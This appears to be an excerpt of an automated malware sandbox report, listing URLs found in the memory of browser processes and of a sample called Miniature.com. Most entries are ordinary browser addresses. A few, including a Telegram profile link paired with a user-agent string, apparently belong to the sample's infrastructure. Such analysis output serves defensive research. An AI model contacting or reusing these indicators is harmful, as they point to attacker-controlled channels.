                                                                      https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000015.00000002.1723793429.000001040044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724970029.00000104007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ntp.msn.com/_defaultQuotaManager.26.drfalse
                                                                          		high
                                                                          http://anglebug.com/4633chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://anglebug.com/7382chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://issuetracker.google.com/284462263msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://deff.nelreports.net/api/report?cat=msnReporting and NEL.27.dr, 2cc80dabc69f58b6_0.26.drfalse
                                                                                  		high
                                                                                  https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://deff.nelreports.net/api/reportReporting and NEL.27.drfalse
                                                                                      		high
                                                                                      https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 00000015.00000003.1656463048.000001040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656283637.00000104010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654019896.0000010400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655277129.0000010400F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655465930.0000010400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726079740.00000104009D3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654225631.0000010401074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654156700.00000104010A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654126224.0000010401058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654184417.0000010400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655325555.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727224250.0000010400D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655229954.0000010400D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/document/:chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.27.drfalse
                                                                                                		high
                                                                                                https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000015.00000002.1726079740.00000104009D3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1652979145.0000010400FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726052953.00000104009B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://anglebug.com/7714chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://unisolated.invalid/chrome.exe, 00000015.00000002.1726178765.00000104009E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000015.00000003.1656463048.000001040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656283637.00000104010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.com/chrome/tips/chrome.exe, 00000015.00000002.1728069945.0000010400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725887499.0000010400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://drive.google.com/?lfhs=2chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/6248chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedgec8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office.com/mail/compose?isExtension=truec8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/6929chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/5281chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.youtube.com/?feature=ytcachrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://issuetracker.google.com/255411748msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://anglebug.com/7246chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://anglebug.com/7369chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://anglebug.com/7489chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://duckduckgo.com/?q=chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://chrome.google.com/webstorechrome.exe, 00000015.00000003.1655875411.0000010400D84000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://i.pki.goog/r1.crt0chrome.exe, 00000015.00000003.1678378459.00000104002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726902512.0000010400C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000015.00000003.1656463048.000001040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656283637.00000104010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654019896.0000010400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655277129.0000010400F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655465930.0000010400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726079740.00000104009D3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654225631.0000010401074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654156700.00000104010A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654126224.0000010401058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1654184417.0000010400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655325555.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727224250.0000010400D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655229954.0000010400D08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Miniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://t.me/k04aelm0nk3Mozilla/5.0Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.autoitscript.com/autoit3/XMiniature.com, 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp, Miniature.com.2.dr, Reviewed.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://issuetracker.google.com/161903006msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.ecosia.org/newtab/Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724742026.0000010400740000.00000004.00000800.00020000.00000000.sdmp, 5FCJE3.16.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://excel.new?from=EdgeM365Shorelinec8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.google.com/Chartk3chrome.exe, 00000015.00000002.1725207665.000001040081C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://i.pki.goog/wr2.crt0chrome.exe, 00000015.00000003.1678378459.00000104002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726902512.0000010400C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://duckduckgo.com/favicon.icochrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000015.00000002.1723793429.000001040044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724970029.00000104007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/3078chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/7553chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/5375chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.27.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ogs.googchrome.exe, 00000015.00000002.1722678966.00000104000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5371chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/4722chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://m.google.com/devicemanagement/data/apichrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/7556chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://chromewebstore.google.com/chrome.exe, 00000015.00000002.1722870036.000001040018C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.26.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgMiniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://clients4.google.com/chrome-syncchrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/6692chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/3502chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://www.office.comc8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/3625msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://outlook.live.com/mail/0/c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://anglebug.com/3624msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://docs.google.com/presentation/Jchrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://t.mMiniature.com, 00000010.00000003.1461059136.00000000043CF000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461285566.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461401955.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461010289.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://anglebug.com/5007chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723566178.0000010400394000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://ntp.msn.com/edge/ntp000003.log7.26.dr, 2cc80dabc69f58b6_1.26.drfalse
                                                                                                                                                                                                                                      		high
